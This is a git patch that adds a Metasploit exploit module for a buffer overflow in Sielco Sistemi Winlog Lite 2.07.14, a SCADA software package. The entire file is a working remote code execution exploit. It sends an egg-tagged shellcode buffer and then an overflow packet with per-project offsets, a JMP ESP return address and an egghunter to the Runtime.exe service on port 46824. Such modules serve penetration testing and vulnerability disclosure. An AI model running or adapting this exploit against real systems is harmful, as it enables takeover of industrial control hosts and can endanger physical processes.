From 08ff6c72b175ef2697802f4ac9f1ebed2198a73e Mon Sep 17 00:00:00 2001
From: m-1-k-3 <michael.messner@integralis.com>
Date: Mon, 4 Jun 2012 17:24:01 +0200
Subject: [PATCH] winlog_lite_2.07.14 initial commit

---
 .../windows/scada/winlog_lite_2.07.14.rb      | 102 ++++++++++++++++++
 1 file changed, 102 insertions(+)
 create mode 100644 modules/exploits/windows/scada/winlog_lite_2.07.14.rb

diff --git a/modules/exploits/windows/scada/winlog_lite_2.07.14.rb b/modules/exploits/windows/scada/winlog_lite_2.07.14.rb
new file mode 100644
index 0000000000..5539317f9a
--- /dev/null
+++ b/modules/exploits/windows/scada/winlog_lite_2.07.14.rb
@@ -0,0 +1,102 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::Egghunter
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Sielco Sistemi Winlog Buffer Overflow 2.07.14',
+			'Description'	=> %q{
+  					This module exploits a buffer overflow in Sielco Sistem Winlog <=
+					2.07.14. When sending a specially formatted packet to the
+					Runtime.exe service on port 46824, an attacker may be able to execute arbitrary
+					code. The reliability depends on the actual project. We need to generate some more
+					targets. Two of them for the default project and one other project is now available.
+					
+			},
+			'License'		=> MSF_LICENSE,
+			'Author'		=>
+				[
+					'm-1-k-3 <m1k3@s3cur1ty.de>',
+				],
+			'References'	=>
+				[
+					[ 'URL', 'http://www.s3cur1ty.de' ],
+					[ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'process', 
+				},
+			'Platform'	=> 'win',
+			'Payload'	=>
+				{
+                                        'Space'    => 2000,
+					'BadChars' => "\x00",
+					'DisableNops' => true,
+				},
+                        'Platform'       => 'win',
+
+			'Targets'		=>
+				[
+					[ 'Ceramics Kiln Project',
+						{
+							'Ret'   	=>	0x405153df,
+							'Offset'	=>	167,
+						}
+					], #  Jmp ESP - Vclx40.bpl - 0x405153df
+					[ 'Automatic Washing System Project',
+						{
+							'Ret'   	=>	0x405153df,
+							'Offset'	=>	151,
+						}
+					], #  Jmp ESP - Vclx40.bpl - 0x405153df
+				],
+			'Privileged'	=> false,
+			'DisclosureDate'	=> 'June 04 2012',
+			'DefaultTarget'	=> 0))
+
+		register_options([Opt::RPORT(46824)], self.class)
+
+	end
+
+	def exploit
+
+
+		connect
+
+		egghunter,egg = generate_egghunter(payload.encoded, payload_badchars)
+
+		print_status("placing the shellcode")
+		shellcode = rand_text_alpha(2000)
+		shellcode << egg
+		sock.put(shellcode)
+		
+		print_status("sleeping ...")
+		sleep(5)
+		
+		buffer = rand_text_alpha(20) 
+		buffer << "\x14" * 10 	#trigger the crash
+		buffer << rand_text_alpha(target['Offset'])
+		buffer << [target.ret].pack('V')
+		buffer << egghunter
+		buffer << rand_text_alpha(69 - egghunter.length)
+
+		print_status("Trying target #{target.name}...")
+		sock.put(buffer)
+
+		handler
+		disconnect
+
+	end
+end